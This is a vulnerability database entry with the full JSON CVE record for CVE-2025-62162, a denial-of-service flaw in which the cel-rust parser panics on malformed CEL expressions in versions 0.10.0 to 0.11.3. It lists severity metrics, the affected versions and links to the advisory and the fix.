                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-20 - Improper Input Validation

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/cel-rust/cel-rust/security/adv…	x_refsource_CONFIRM
https://github.com/cel-rust/cel-rust/releases/tag…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
cel-rust	cel-rust	Affected: >= 0.10.0, < 0.11.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-62162",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-14T13:43:26.615519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-14T14:16:20.443Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/cel-rust/cel-rust/security/advisories/GHSA-wxwx-9fh7-5mrw"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "cel-rust",
          "vendor": "cel-rust",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.10.0, \u003c 0.11.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "cel-rust is a Common Expression Language interpreter written in Rust. Starting in version 0.10.0 and prior to version 0.11.4, parsing certain malformed CEL expressions can cause the parser to panic, terminating the process. When the crate is used to evaluate untrusted expressions (e.g., user-supplied input over an API), an attacker can send crafted input to trigger a denial of service (DoS). Version 0.11.4 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-10T22:25:42.027Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/cel-rust/cel-rust/security/advisories/GHSA-wxwx-9fh7-5mrw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/cel-rust/cel-rust/security/advisories/GHSA-wxwx-9fh7-5mrw"
        },
        {
          "name": "https://github.com/cel-rust/cel-rust/releases/tag/cel-v0.11.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/cel-rust/cel-rust/releases/tag/cel-v0.11.4"
        }
      ],
      "source": {
        "advisory": "GHSA-wxwx-9fh7-5mrw",
        "discovery": "UNKNOWN"
      },
      "title": "cel-rust May Panic During Parsing of Invalid CEL Expressions"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-62162",
    "datePublished": "2025-10-10T22:25:42.027Z",
    "dateReserved": "2025-10-07T16:12:03.424Z",
    "dateUpdated": "2025-10-14T14:16:20.443Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-WXWX-9FH7-5MRW

Summary

Remediation

PoC

Impact

CVE-2025-62162 (GCVE-0-2025-62162)

Tags

Sightings

Nomenclature